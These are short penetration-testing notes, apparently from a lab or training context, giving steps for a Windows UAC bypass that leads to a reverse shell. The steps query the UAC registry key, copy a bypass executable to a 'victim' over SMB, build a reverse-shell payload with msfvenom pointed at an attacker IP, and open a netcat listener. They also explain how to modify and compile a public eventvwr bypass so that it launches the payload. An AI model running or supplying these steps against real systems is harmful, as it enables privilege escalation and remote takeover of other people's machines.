UAC Bypass

• Check for it:

reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System

• I followed these steps

• https://ivanitlearning.wordpress.com/2019/07/07/bypassing-default-uac-settings-manually/

• Copy this over to victim (with SMB)

/root/uac-bypass.exe

• Create the payload to get a reverse shell

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.241 LPORT=443 -f exe > shell.exe

• Copy the shell.exe over to victim as well, make sure they share the directory

nc -nvlp 443

• $PROFIT$

From Scratch

• Code here: https://github.com/turbo/zero2hero/blob/master/main.c

• Change line 68:

strcat(curPath, "\\foobar.exe");

• Make the exe whatever you named your msfvenom payload

• Compile

x86_64-w64-mingw32-gcc eventvwr-bypassuac.c -o uac-bypass.exe

• Follow above steps to transfer and run